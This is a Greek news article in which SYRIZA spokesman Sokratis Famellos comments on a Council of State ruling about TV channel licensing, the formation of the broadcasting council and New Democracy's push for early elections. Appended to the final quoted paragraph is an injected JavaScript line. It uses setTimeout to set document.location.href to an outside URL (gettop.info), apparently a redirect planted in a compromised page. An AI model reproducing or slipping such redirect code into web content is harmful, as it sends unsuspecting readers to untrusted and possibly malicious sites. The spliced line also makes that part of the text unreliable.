Φάμελλος: Σε ετοιμότητα ώστε να μην υπάρξει λειτουργία των καναλιών εκτός συνταγματικού πλαισίου

0
3

 

«Δεν καθυστερούμε ούτε δευτερόλεπτο» δήλωσε στον ραδιοφωνικό σταθμό του Αθηναϊκού Πρακτορείου «Πρακτορείο FM 104,9» ο κοινοβουλευτικός εκπρόσωπος του ΣΥΡΙΖΑ, Σωκράτης Φάμελλος, μετά την απόφαση του ΣτΕ.

Συμπλήρωσε ότι υπάρχει ετοιμότητα προκειμένου να μην υπάρξει κανένα χρονικό διάστημα στο οποίο η λειτουργία των τηλεοπτικών καναλιών να είναι εκτός συνταγματικού και εκτός νομοθετικού πλαισίου. «Θα ετοιμάσουμε την επόμενη μέρα της αδειοδότησης λαμβάνοντας υπόψη την πρόβλεψη του Συμβουλίου της Επικρατείας» τόνισε. Πάντως, ο κ. Φάμελλος υπογράμμισε ότι μέχρι στιγμής δεν υπάρχει ανακοίνωση περί αντισυνταγματικότητας του συνόλου του νόμου, υπάρχει μόνο για το άρθρο 2.

«Οι προδιαγραφές σχετικά με το πλήθος των εργαζομένων, με τον εξοπλισμό και τον πλουραλισμό του προγράμματος παραμένουν. Με αυτές λοιπόν τις προδιαγραφές θα δοθούν προσωρινές άδειες χωρίς να υπάρχει ένα κλειστό καρτέλ, χωρίς δηλαδή να υπάρχει περιορισμός αλλά πραγματικά με ελεύθερη βούληση των επιχειρηματιών να καταθέσουν το ποσό για την προσωρινή άδεια και να έχουν τις τυπικές προϋποθέσεις» τόνισε ο κοινοβουλευτικός εκπρόσωπος του ΣΥΡΙΖΑ.

Σχολιάζοντας την απόφαση του Συμβουλίου της Επικρατείας επισήμανε πως το αρνητικό στοιχείο είναι ότι καθυστερεί την εφαρμογή νόμιμων κανόνων και την ολοκλήρωση του διαγωνισμού, ωστόσο είπε ότι υπάρχει και απόφαση του Συμβουλίου της Επικρατείας του 2010 που, όπως τόνισε ο κ. Φάμελλος, «έλεγε ότι πρέπει να δοθούν άδειες γιατί είναι αντισυνταγματικό να μην υπάρχουν άδειες». Το θετικό κατά τη γνώμη του κοινοβουλευτικού εκπροσώπου του ΣΥΡΙΖΑ είναι ότι «το Συμβούλιο της Επικρατείας, αν το σκεπτικό του στηρίζεται στη συγκρότηση του Εθνικού Συμβουλίου Ραδιοτηλεόρασης, δίνει και μια εντολή ταυτόχρονα να συγκροτηθεί Εθνικό Συμβούλιο Ραδιοτηλεόρασης».

«Συμφωνούμε λοιπόν εδώ εμείς με το Συμβούλιο της Επικρατείας, αν αυτό είναι το σκεπτικό του, ότι εκτός από την αναστολή και την καθυστέρηση εφαρμογής του νόμου, λέει ταυτόχρονα συγκροτήστε ΕΣΡ. Δεν νομίζω τώρα ότι υπάρχει καμιά δικαιολογία για τη ΝΔ να συνεχίσει να εκβιάζει και να μην συναινεί στη συγκρότηση ΕΣΡ» πρόσθεσε.

Ερωτηθείς για την τοποθέτηση της ΝΔ ότι η προκήρυξη πρόωρων εκλογών είναι σήμερα περισσότερο από ποτέ επιβεβλημένη απάντησε: «είναι προφανές ότι η ΝΔ θέλει να γυρίσουμε σε ένα καθεστώς στο οποίο να μην υπάρχουν κανόνες, οι πλούσιοι να γίνονται πλουσιότεροι και προφανώς κάποιες οικογένειες να νέμονται τις καρέκλες της εξουσίας και να πληρώνουμε οι Έλληνες φορολογούμενοι για να διοικούν κάποιοι ένα σταθερό κλειστό σύστημα εξουσίας. Αυτό έχει τελειώσει. Δεν μπορεί να γίνει». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here